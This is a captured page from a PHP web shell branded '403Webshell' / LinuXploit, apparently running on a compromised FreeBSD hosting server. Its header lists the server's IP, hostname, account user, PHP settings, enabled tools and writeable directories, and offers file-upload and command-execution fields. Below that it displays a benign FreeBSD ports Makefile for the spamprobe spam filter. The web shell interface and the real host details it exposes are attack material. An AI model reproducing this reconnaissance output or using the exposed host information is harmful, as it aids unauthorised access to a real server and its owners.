403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/mail/spamprobe/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/mail/spamprobe/Makefile
PORTNAME=		spamprobe
PORTVERSION=	1.4d
PORTREVISION=	19
CATEGORIES=		mail
MASTER_SITES=	SF

MAINTAINER=	ports@FreeBSD.org
COMMENT=	Spam detector using Bayesian analysis of word counts
WWW=		http://spamprobe.sourceforge.net/

GNU_CONFIGURE=	yes
CONFIGURE_ARGS=	--enable-default-8bit

PLIST_FILES=	bin/spamprobe man/man1/spamprobe.1.gz

OPTIONS_DEFINE=	GIF JPEG PNG
OPTIONS_MULTI=	DATABASE
OPTIONS_MULTI_DATABASE=	PBL BDB
OPTIONS_DEFAULT=PBL GIF JPEG PNG
PBL_DESC=		PBL database support (author's recommended data store)

CPPFLAGS+=	-I${LOCALBASE}/include
LDFLAGS+=	-L${LOCALBASE}/lib

# PBL support
PBL_BUILD_DEPENDS=	${LOCALBASE}/lib/libpbl.a:databases/libpbl
PBL_RUN_DEPENDS+=	${PBL_BUILD_DEPENDS}
PBL_CONFIGURE_WITH=	pbl
PBL_LDFLAGS=	-lpbl

# BerkleyDB support
BDB_CONFIGURE_ENABLE=	cdb
BDB_CONFIGURE_WITH=	db
BDB_CPPFLAGS=	-DUSE_DB=1

# giflib support
GIF_CONFIGURE_WITH=	gif
GIF_LIB_DEPENDS=	libgif.so:graphics/giflib

# PNG support
PNG_CONFIGURE_WITH=	png
PNG_LIB_DEPENDS=	libpng.so:graphics/png

# JPEG support
JPEG_CONFIGURE_WITH=jpeg
JPEG_USES=		jpeg

.include <bsd.port.options.mk>

.if ${PORT_OPTIONS:MBDB}
USES+=		bdb
CPPFLAGS+=	-I${BDB_INCLUDE_DIR}
LDFLAGS+=	-l${BDB_LIB_NAME}
.endif

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit